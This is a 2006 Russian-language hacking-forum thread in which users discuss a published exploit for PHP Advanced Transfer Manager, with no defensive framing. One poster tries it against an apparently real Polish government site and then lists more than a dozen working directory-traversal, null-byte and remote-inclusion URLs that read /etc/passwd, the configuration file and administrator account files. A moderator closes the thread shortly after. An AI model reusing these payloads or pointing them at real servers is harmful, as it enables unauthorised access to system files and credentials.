PHP Advanced Transfer Manager

Discussion in 'Уязвимости' started by karabym, 26 Dec 2006.

Thread Status:
Not open for further replies.
  1. karabym

    karabym Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    196
    Likes Received:
    30
    Reputations:
    1
    Разьясните что делает эта уязвимость ?!

    http://www.milw0rm.com/exploits/2968
     
    #1 karabym, 26 Dec 2006
  2. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Там же всё прекрастно Написано

    in folder users we dont find any file like: .htaccess so we can read all files :)
    or you can read all files in ftp :)
     
    #2 limpompo, 26 Dec 2006
  3. karabym

    karabym Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    196
    Likes Received:
    30
    Reputations:
    1
    limpompo c энглишом проблем елси не сложно просвяти :)
     
    #3 karabym, 26 Dec 2006
  4. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    написано что в пользовательской папке не будет файлов а-ля .htaccess, благодаря чему появится возможность читать все файлы (в том числе и по ftp)
     
    #4 злюка, 26 Dec 2006
  5. karabym

    karabym Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    196
    Likes Received:
    30
    Reputations:
    1
    Погодь погодь !! тоесть можно будет просматреть все файлы на веб сервере ?!
     
    #5 karabym, 26 Dec 2006
    Last edited: 26 Dec 2006
  6. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    я только перевёл :) ...сам сплоит не юзал и даже в код не зглядывал.
     
    #6 злюка, 26 Dec 2006
  7. karabym

    karabym Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    196
    Likes Received:
    30
    Reputations:
    1
    Хех придеца качать етот обмещик...конечно можно было сразу это зделать и не задавать глупых вопрос но вдруг дело выделки не стоит :)

    ЭХ эта лень во всем она виновата :)
     
    #7 karabym, 26 Dec 2006
  8. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    karabym - Если у тебя проблемы тебе надо на www.translate.ru/text.asp
     
    #8 limpompo, 26 Dec 2006
  9. karabym

    karabym Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    196
    Likes Received:
    30
    Reputations:
    1
    limpompo спасиб будем пользоваться :)
     
    #9 karabym, 26 Dec 2006
  10. karabym

    karabym Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    196
    Likes Received:
    30
    Reputations:
    1
    Потыкался я тут с этим сплойтом работает он как веб скрипт но както криво...

    Скажите лутше как составить запрос чтобы читать файло

    http://site.gov.pl/upload/viewers/html.php?current_dir=..&filename=[file]

    Я так понимаю current_dir=директория_на_вебсерве&имя_файла=[раcширение_файла]

    Попробовал так но чтото не получается..
     
    #10 karabym, 28 Dec 2006
  11. karabym

    karabym Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    196
    Likes Received:
    30
    Reputations:
    1
    Порылся по просторам тырнета и нашел кучу дыр под ето приложение :D

    http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc/passwd%00
    http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc&filename=passwd
    http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc/passwd%00
    http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc&filename=passwd
    http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc/passwd%00
    http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc&filename=passwd
    http://www.example.com/phpatm/viewers/htm.php?current_dir=http://www.asite.com%00
    http://www.example.com/phpatm/html.php?current_dir=http:/&filename=www.asite.com
    http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../../[filename].zip%00
    http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../..&filename=[filename].zip
    http://www.example.com/phpatm/viewers/txt.php?current_dir=../include&filename=conf.php
    http://www.example.com/phpatmviewers/txt.php?current_dir=../userstat&filename=[admin_name].stat
    http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/admin%00
    http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/[admin_name]%00
     
    #11 karabym, 28 Dec 2006
  12. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Тема утратила смысл.Закрыто.
     
    #12 m0nzt3r, 28 Dec 2006
    1 person likes this.
(You must log in or sign up to post here.)
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.